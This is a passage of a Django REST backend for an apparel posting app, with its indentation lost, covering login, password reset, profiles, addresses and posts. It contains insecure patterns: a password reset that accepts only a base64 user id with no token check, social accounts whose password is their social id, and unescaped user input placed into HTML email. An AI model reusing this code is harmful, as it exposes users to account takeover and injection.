if codeExist is not None and codeExist.codeUsed == 0:
context = {'validlink': True, 'userId': b64UserId}
return render(request, 'passwordReset/Reset_pwd.html',context)
else:
print(traceback.format_exc())
context = {'validlink': False}
return render(request, 'passwordReset/Reset_pwd.html',context)
# =====================================
# Forget Password
# =========================================
@csrf_exempt
@api_view(['POST'])
def ForgetPassword(request):
try:
with transaction.atomic():
b64Id = request.data['uid']
b64UserDId = urlsafe_base64_decode(b64Id)
newPassword = request.data['newPassword']
user = User.objects.get(id=b64UserDId)
if user.password == newPassword:
return Response({"message": "You have used an old password!!", "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
u = User.objects.get(id=user.id)
u.set_password(newPassword)
u.save()
userUpdate = User.objects.filter(id=user.id).update(password=make_password(newPassword))
if userUpdate:
rec = ForgetPasswordLog.objects.filter(user_id=user.id).latest('createdTime')
if rec is not None:
ForgetPasswordLog.objects.filter(id=rec.id).update(codeUsed=1)
print(rec)
return Response({"message": "Password reset successfully!!", "status": "1"},
status=status.HTTP_201_CREATED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Method for term and condition
#===============================================
def Terms_Conditions(request):
return render(request, "passwordReset/term&conditions.html")
#==============================================
# Method for Privacy Policy
#===============================================
def privacy_policy(request):
return render(request, "passwordReset/privacy.html")
#========================================
# Method for Cancel policy
#========================================
def cancel_policy(request):
return render(request, "passwordReset/cancel.html")
#========================================
# api for login user
#========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def Applogin(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
deviceId = received_json_data['deviceId']
deviceType = received_json_data['deviceType']
user = authenticate(username=received_json_data['email'], password=received_json_data['password'])
nowTime = datetime.datetime.now()
if user:
if user.is_email_verified == -1:
return Response({"message" : "Please verify your email first"}, status=status.HTTP_201_CREATED)
else:
if deviceId !="":
User.objects.filter(id=user.id).update(deviceId = deviceId,deviceType = deviceType,login_type='e',lastUpdated = nowTime)
if user is not None:
if user.is_active:
token = ''
try:
user_with_token = Token.objects.get(user=user)
except:
user_with_token = None
if user_with_token is None:
token1 = Token.objects.create(user=user)
token = token1.key
else:
Token.objects.get(user=user).delete()
token1 = Token.objects.create(user=user)
token = token1.key
user1 = User.objects.get(id = user.id)
if user.user_name == "":
canAddPost = False
if user.fullname == "":
canAddPost = False
else:
canAddPost = False
else:
canAddPost = True
if user.fullname == "":
canAddPost = False
else:
canAddPost = True
if user.is_pro_created == False:
userDetail = {
"id" : user.id,
"token": token,
"email":user.email,
"phone":user.phone,
"fullname":user.fullname,
"address":user.address,
"date_of_birth":user.date_of_birth,
"gender":user.gender,
"about_me":user.about_me,
"login_type": user1.login_type,
"user_name":user.user_name,
"deviceId":deviceId,
"deviceType": deviceType,
"is_profile_created": user.is_pro_created,
"image":user.image,
"notificationStatus": user.onoffnotification
}
return Response({"message" : errorIncompleteProfile,"response":userDetail}, status=status.HTTP_200_OK) #This will represent missing invite friends
else:
userDetail = {
"id" : user.id,
"token" : token,
"email":user.email,
"phone":user.phone,
"fullname":user.fullname,
"address":user.address,
"date_of_birth":user.date_of_birth,
"gender":user.gender,
"about_me":user.about_me,
"login_type": user.login_type,
"user_name":user.user_name,
"deviceId":deviceId,
"deviceType": deviceType,
"is_profile_created": user.is_pro_created,
"image": user.image,
"notificationStatus": user.onoffnotification,
"canAddPost" : canAddPost
}
return Response({"message" : loginSuccessMessage, "response":userDetail}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorBlockedAcount}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorEmailPasswordIncorrect}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
# social login via instagram,facebook,gmail
#====================================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SocialLogin(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
nowTime = datetime.datetime.now()
deviceId = received_json_data['deviceId']
deviceType=received_json_data['deviceType']
social_id=received_json_data['social_id']
if social_id != "":
try:
user1 = User.objects.get(social_id=social_id)
except:
user1 = None
if user1 is not None:
authuser = authenticate(username=social_id, password=social_id)
if authuser:
if deviceId != "":
User.objects.filter(id = user1.id).update(deviceId = deviceId,deviceType=deviceType)
user2 = User.objects.get(id = user1.id)
token = ''
try:
user_with_token = Token.objects.get(user=authuser)
except:
user_with_token = None
if user_with_token is None:
token1 = Token.objects.create(user=authuser)
token = token1.key
else:
Token.objects.get(user=authuser).delete()
token1 = Token.objects.create(user=authuser)
token = token1.key
if user2.user_name == "":
canAddPost = False
if user2.fullname == "":
canAddPost = False
else:
canAddPost = False
else:
canAddPost = True
if user2.fullname == "":
canAddPost = False
else:
canAddPost = True
if user2.is_pro_created == False:
userDetail = {
"id" : user2.id,
"token": token,
"email" : user2.email,
"fullname" : user2.fullname,
"gender" : user2.gender,
"about_me" : user2.about_me,
"social_id" : user2.social_id,
"image": user2.image,
"user_name" : user2.user_name,
"login_type" : user2.login_type,
"date_of_birth" : user2.date_of_birth,
"phone" : user2.phone,
"address" : user2.address,
"deviceId" : user2.deviceId,
"deviceType" : user2.deviceType,
"created_time" : user2.created_time,
"is_profile_created" :user2.is_pro_created,
"notificationStatus" : user2.onoffnotification,
}
return Response({"message" : errorIncompleteProfile, "response": userDetail}, status=status.HTTP_200_OK)
else:
userDetail = {
"id" : user2.id,
"token": token,
"email" : user2.email,
"fullname" : user2.fullname,
"gender" : user2.gender,
"about_me" : user2.about_me,
"social_id" : user2.social_id,
"image": user2.image,
"user_name" : user2.user_name,
"login_type" : user2.login_type,
"date_of_birth" : user2.date_of_birth,
"phone" : user2.phone,
"address" : user2.address,
"deviceId" : user2.deviceId,
"deviceType" : user2.deviceType,
"created_time" : user2.created_time,
"is_profile_created" :user2.is_pro_created,
"notificationStatus" : user2.onoffnotification,
"canAddPost": canAddPost
}
return Response({"message" : loginSuccessMessage,"response":userDetail}, status=status.HTTP_200_OK)
elif (received_json_data['login_type'] == "f" or received_json_data['login_type'] == "g" or received_json_data['login_type'] == "ap"):
email = received_json_data['email']
if received_json_data['login_type'] == "ap":
user=None
else:
user = User.objects.filter(email = email).exists()
if user:
return Response({"message" : errorEmailExist}, status=status.HTTP_409_CONFLICT)
else:
user = User.objects.create(username = received_json_data['social_id'],
social_id = received_json_data['social_id'],
email = received_json_data['email'],
password = make_password(received_json_data['social_id']),
deviceId = received_json_data['deviceId'],
deviceType = received_json_data['deviceType']
)
if user is not None:
if received_json_data['login_type'] == "f":
User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_F)
if received_json_data['login_type'] == "g":
User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_G)
if received_json_data['login_type'] == "ap":
User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_AP)
g = Group.objects.get(name='User')
g.user_set.add(user)
token = ''
try:
user_with_token = Token.objects.get(user=user)
except:
user_with_token = None
if user_with_token is None:
token1 = Token.objects.create(user=user)
token = token1.key
else:
Token.objects.get(user=user).delete()
token1 = Token.objects.create(user=user)
token = token1.key
user = User.objects.get(id =user.id)
userdetail = {
"id" : user.id,
"token": token,
"email" : user.email,
"fullname" : user.fullname,
"gender" : user.gender,
"about_me" : user.about_me,
"social_id" : user.social_id,
"image": user.image,
"user_name" : user.user_name,
"login_type" : user.login_type,
"date_of_birth" : user.date_of_birth,
"phone" : user.phone,
"address" : user.address,
"deviceId" : user.deviceId,
"deviceType" : user.deviceType,
"created_time" : user.created_time,
"is_profile_created" :user.is_pro_created,
"notificationStatus" : user.onoffnotification,
}
return Response({"message" : loginSuccessMessage,"response":userdetail}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
if received_json_data['login_type'] == "i":
user = User.objects.create(username = received_json_data['social_id'],
social_id = received_json_data['social_id'],
password = make_password(received_json_data['social_id']),
deviceId = received_json_data['deviceId'],
deviceType = received_json_data['deviceType']
)
if user is not None:
if received_json_data['login_type'] == "i":
User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_I)
g = Group.objects.get(name='User')
g.user_set.add(user)
token = ''
try:
user_with_token = Token.objects.get(user=user)
except:
user_with_token = None
if user_with_token is None:
token1 = Token.objects.create(user=user)
token = token1.key
else:
Token.objects.get(user=user).delete()
token1 = Token.objects.create(user=user)
token = token1.key
userdetail = {
"id" : user.id,
"token": token,
"email" : user.email,
"fullname" : user.fullname,
"gender" : user.gender,
"about_me" : user.about_me,
"social_id" : user.social_id,
"image": user.image,
"user_name" : user.user_name,
"date_of_birth" : user.date_of_birth,
"phone" : user.phone,
"address" : user.address,
"deviceId" : user.deviceId,
"deviceType" : user.deviceType,
"created_time" : user.created_time,
"is_profile_created" :user.is_pro_created,
"notificationStatus" : user.onoffnotification,
}
return Response({"message" : loginSuccessMessage,"response":userdetail}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for create user profile
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def CreateProfile(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.POST['data'], strict=False)
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='User').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
user_name = received_json_data['user_name']
fullname = received_json_data['fullname']
if user_name == "":
canAddPost = False
if fullname == "":
canAddPost = False
else:
canAddPost = False
else:
canAddPost = True
if fullname == "":
canAddPost = False
else:
canAddPost = True
address = received_json_data['address']
gender = received_json_data['gender']
date_of_birth = received_json_data['date_of_birth']
about_me = received_json_data['about_me']
if date_of_birth == "":
date_of_birth = None
else:
date_of_birth = datetime.datetime.strptime(date_of_birth, '%Y-%m-%d')
is_from_edit = received_json_data['is_from_edit']
if is_from_edit == 1:
if user_name =="":
user1= None
else:
user1 = User.objects.filter(user_name = user_name).exists()
user11 =User.objects.filter(user_name = user_name)
for i in user11:
if i.id==user.id:
user1=None
if user1:
return Response({"message" : "username already exist", "status" : "0"}, status=status.HTTP_409_CONFLICT)
else:
User.objects.filter(id=user.id).update(user_name = user_name,fullname=fullname,address=address,gender=gender,about_me=about_me,date_of_birth = date_of_birth)
user1 = User.objects.get(id = user.id)
if user1:
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
User.objects.filter(id = user.id).update(image = uploaded_file_url)
user2 = User.objects.get(id = user.id)
imageUrl = user2.image
userDetail = {
"user_name": user1.user_name,
"fullname" : user1.fullname,
"address": user1.address,
"gender": user1.gender,
"about_me": user1.about_me,
"date_of_birth":user1.date_of_birth,
"image":imageUrl,
"canAddPost": canAddPost
}
return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
else:
userDetail = {
"user_name": user1.user_name,
"fullname" : user1.fullname,
"address": user1.address,
"gender": user1.gender,
"about_me": user1.about_me,
"date_of_birth":user1.date_of_birth,
"image":user.image,
"canAddPost": canAddPost
}
return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage}, status=status.HTTP_201_CREATED)
else:
if user_name =="":
user1= None
else:
user1 = User.objects.filter(user_name = user_name).exists()
if user1:
return Response({"message" : "username already exist", "status" : "0"}, status=status.HTTP_409_CONFLICT)
else:
date_birth = received_json_data['date_of_birth']
if date_birth == "":
date_of_birth = None
else:
date_of_birth = datetime.datetime.strptime(date_birth, '%Y-%m-%d')
User.objects.filter(id=user.id).update(user_name = user_name,fullname=fullname,address=address,gender=gender,about_me=about_me,date_of_birth = date_of_birth,is_pro_created =1)
user1 = User.objects.get(id = user.id)
if user1:
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
User.objects.filter(id = user.id).update(image = uploaded_file_url)
user2 = User.objects.get(id = user.id)
imageUrl = user2.image
userDetail = {
"user_name": user1.user_name,
"fullname" : user1.fullname,
"address": user1.address,
"gender": user1.gender,
"about_me": user1.about_me,
"date_of_birth":user1.date_of_birth,
"image":imageUrl,
"canAddPost": canAddPost
}
return Response({ 'message': addSuccessMessage, 'data':userDetail}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================
# api for change password
#==========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def ChangePassword(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},
status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
currentPassword = received_json_data['currentPassword']
success = user.check_password(currentPassword)
if success:
if currentPassword == received_json_data['newPassword']:
return Response({"message": "Please Enter a Different Password", "status": "0"},
status=status.HTTP_406_NOT_ACCEPTABLE)
else:
u = User.objects.get(id=user.id)
u.set_password(received_json_data['newPassword'])
result = User.objects.filter(id=user.id).update(
password=make_password(received_json_data['newPassword']))
if result:
return Response({"message": "Password updated Successfully"}, status=status.HTTP_200_OK)
else:
return Response({"message": "Password not updated successfully"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": "Please enter the correct old password", "status": "0"}, status=status.HTTP_406_NOT_ACCEPTABLE)
else:
return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
except Exception:
print(traceback.format_exc())
return Response({"message": errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# @csrf_exempt
# @api_view(['PUT'])
# def update_profile_info(request):
# try:
# with transaction.atomic():
# #received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
# received_json_data = json.loads(request.data['data'], strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# a = User.objects.filter(user_name = received_json_data['user_name']).exists()
# if a:
# return Response({"message" : errorUserNameExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
# else:
# user1 = User.objects.filter(id = user.id).update(
# email = received_json_data['email'],
# fullname = received_json_data['fullname'],
# gender = received_json_data['gender'],
# dob =received_json_data['dob'],
# about_me =received_json_data['about_me'],
# address = received_json_data['address'],
# user_name = received_json_data['user_name']
# )
# print(user1)
# if user1:
# file = request.FILES.get('image')
# if file is not None:
# fs = FileSystemStorage()
# filename = fs.save("profileimages/"+str(user.id)+"/"+file.name, file)
# uploaded_file_url = fs.url(filename)
# User.objects.filter(id = user.id).update(image = uploaded_file_url)
# user = User.objects.get(id = user.id)
# user_detail = {"last_login" : user.last_login,
# "user_name" : user.user_name,
# "email" : user.email,
# "fullname" : user.fullname,
# "dob" : user.dob,
# "about_me" : user.about_me,
# "address" : user.address,
# "gender" : user.gender,
# "image":user.image
# }
# print(user_detail)
# return Response({"message" : addSuccessMessage, "status" : "1","user_detail":user_detail}, status=status.HTTP_200_OK)
# else:
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#========================================
# API for add new address
#========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def addAddress(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
address = Addresses.objects.create(first_name = received_json_data['first_name'],
last_name = received_json_data['last_name'],
phone = received_json_data['phone'],
address = received_json_data['address'],
city = received_json_data['city'],
postal_code = received_json_data['postal_code'],
user_id = user.id,
status = 1)
address_detail = {
"message":addAddressSuccessMessage,
"id" : address.id,
"first_name":address.first_name,
"last_name": address.last_name,
"phone": address.phone,
"city": address.city,
"postal_code": address.postal_code,
"address": address.address,
}
if address is not None:
return Response(address_detail, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# API for delete address
#=========================================
@AppVersion_required
@api_view(['POST'])
def deleteAddress(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
address = Addresses.objects.filter(user_id = user.id,id = received_json_data['address']).update(status=0)
if address:
return Response({"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=====================================
# API for get list of address
#=====================================
@AppVersion_required
@api_view(['GET'])
def getAddresses(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
last_ad = OrderTrn.objects.filter(user_id = user.id).order_by('-transaction_time').first()
address = Addresses.objects.filter(user_id = user.id,status=1).order_by('-created_time')
serializer = AddressesSerializer(address,many=True).data
if serializer:
if last_ad:
a = last_ad.address
b = a.id
for c in serializer:
if c['id'] == b:
c['default_address'] = True
else:
c['default_address'] = False
return Response({"message":"Addresses Fetched successfully","data":serializer}, status=status.HTTP_200_OK)
else:
for data in serializer:
data['default_address'] = False
return Response({"message":"Addresses Fetched successfully", "data":serializer}, status=status.HTTP_200_OK)
else:
return Response({"message":"Addresses Fetched successfully", "data":serializer}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================
#contact us
#=================================
@AppVersion_required
@api_view(['POST'])
def ContactUsEmail(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
if checkGroup :
fullname = received_json_data['fullname']
email = received_json_data['email']
subject = received_json_data['subject']
message = received_json_data['message']
email_body = """\
<html>
<head></head>
<body>
<h2>%s</h2>
<p>%s</p>
<p> This email was sent from: </p>
<h5>%s</h5>
<h5>email:%s</h5>
</body>
</html>
""" % (subject, message, fullname, email)
email = EmailMessage('Contact Us Mail ! ', email_body, to=['chaudharymark@gmail.com'])
email.content_subtype = "html" # this is the crucial part
response = email.send()
if response:
contact = ContactUs.objects.create( fullname = fullname,
email = received_json_data['email'],
subject = subject,
message = message,
user_id = user.id)
if contact is not None:
return Response({"status": "1", 'message': 'Email sent successfully.'}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===================================
# logout app user
#===================================
@AppVersion_required
@api_view(['GET'])
def logoutAppUser(request):
try:
with transaction.atomic():
API_KEY = request.META.get('HTTP_AUTHORIZATION')
if API_KEY is not None:
try:
token1 = Token.objects.get(key=API_KEY)
user = token1.user
except:
token1=None
user=None
if user is not None:
user.auth_token.delete()
return Response({"message": "Logged out successfully", "status": "1"}, status=status.HTTP_200_OK)
else:
return Response({"message": "session Expired ! Please Login Again.", "status": "0"},
status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================
#GET size and colour
#=====================================
@AppVersion_required
@api_view(['GET'])
def getFabricSizeColour(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
fabric = Fabric.objects.all()
size = Size.objects.all()
colour = Colour.objects.all()
fabricserializer = FabricSerializer(fabric,many=True)
sizeserializer = SizeSerializer(size,many=True)
colourserializer = ColourSerializer(colour,many=True)
minprice = 15.78
return Response({"fabric":fabricserializer.data,"size":sizeserializer.data,"colour":colourserializer.data,"minimumPrice":minprice}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==================================
# api for add post
#==================================
# @api_view(['POST'])
# def addPost(request):
# try:
# with transaction.atomic():
# received_json_data = json.loads(request.data['data'], strict=False)
# try:
# API_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=API_key)
# user = token1.user
# checkGroup = user.groups.filter(name='User').exists()
# if checkGroup == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# user1 = User.objects.get(id = user.id)
# print(user1)
# size = list(received_json_data['size'])
# # colour = list(received_json_data['colour'])
# fabric = list(received_json_data['fabric'])
# post = Post.objects.create(price = received_json_data['price'],
# post_description = received_json_data['post_description'],
# user_id = user1.id,
# post_status = 1)
# if post is not None:
# post_count = user1.post_count
# User.objects.filter(id = user.id).update(post_count = post_count+1)
# for element in size:
# RelPostSize.objects.create(post_id = post.id,
# size_id = element)
# for data in fabric:
# RelPostFabric.objects.create(post_id=post.id,
# fabric_id=data)
# file = request.FILES.get('post_image')
# print(file)
# fs = FileSystemStorage()
# filename = fs.save("postimages/"+str(post.id)+"/"+file.name, file)
# uploaded_file_url = fs.url(filename)
# Post.objects.filter(id = post.id).update(post_image = uploaded_file_url)
# return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_201_CREATED)
# else:
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['POST'])
def addPost(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.data['data'], strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
size = list(received_json_data['size'])
# colour = list(received_json_data['colour'])
fabric = list(received_json_data['fabric'])
pst_type = received_json_data['post_type']
if pst_type == 'custom':
post = Post.objects.create(price = received_json_data['price'],
post_description = received_json_data['post_description'],
user_id = user.id,
created_time = nowTime,
post_status = 1,
post_printing_size_front = request.data['printingSizefront'],
post_printing_size_back = request.data['printingSizeback'],
post_type=pst_type)
else:
post = Post.objects.create(price = received_json_data['price'],
post_description = received_json_data['post_description'],
user_id = user.id,
created_time = nowTime,
post_status = 1)
if post is not None:
post_count = user.post_count
User.objects.filter(id = user.id).update(post_count = post_count+1)
for element in size:
RelPostSize.objects.create(post_id = post.id,
size_id = element)
for data1 in fabric:
RelPostFabric.objects.create(post_id=post.id,
fabric_id=data1)
list_files = request.FILES.getlist('post_images')
for file in list_files:
fs = FileSystemStorage()
filename = fs.save("postimages/"+str(post.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
aa = PostImage.objects.create(post_images = uploaded_file_url,post_id = post.id)
return Response({"message" : addPostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================================
# Get POst by id
#===========================================================
@AppVersion_required
@csrf_exempt
@api_view(['GET'])
def getPost(request,pk):
try:
with transaction.atomic():
if request.META.get('HTTP_AUTHORIZATION') == None:
post = Post.objects.get(pk=pk,post_status=1)
if post:
post_serializer = PostSerializer(post)
data = post_serializer.data
user = User.objects.get(id=data['user'])
data['fullname'] = user.fullname
data['image'] = user.image
data['address'] = user.address
data['cartCount'] = 0
relpostsize = RelPostSize.objects.values(size_name=F('size__size'),sizeid = F('size__id')).filter(post_id = post.id)
# relpostsize = RelPostSize.objects.values(size='size__size',size1='size__id').filter(post_id = post.id)
# relpostsize = RelPostSize.objects.extra(select={'size_id':'size'}).values('size_id').filter(post_id = post.id)
relpostfabric = RelPostFabric.objects.values(fabric_name=F('fabric__fabric'),fabricid=F('fabric__id')).filter(post_id = post.id)
postimages = PostImage.objects.values('id','post_images').filter(post_id = post.id)
post_img_colour = PostImage.objects.values(colour_name=F('colour__colour_code'),colourid=F('colour__id')).filter(post_id = post.id)
# annotate(s=F('size__id'),s1=F('size__size'))
data['post_like'] = False
data['post_fav'] = False
data['added_to_cart'] = False
temp = []
temp1 = []
temp2 = []
temp3 = []
for ele in postimages:
temp.append(ele)
data['post_image'] = temp
# for colour in post_img_colour:
# temp1.append(colour)
# data['post_image_colour'] = temp1
for size in relpostsize:
temp2.append(size)
data['size'] = temp2
for fabric in relpostfabric:
temp3.append(fabric)
data['fabric'] = temp3
return Response({"message":"post get successfully","data":data},status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
post = Post.objects.get(pk=pk,post_status=1)
post_like = PostLike.objects.filter(user_id =user.id,post_id = post.id)
post_fav = Favourite.objects.filter(user_id = user.id , post_id = post.id)
cart = Cart.objects.filter(user_id = user.id, post_id = post.id)
# cartCount = User.objects.filter(id = user.id)
cart = user.cartNo
if post:
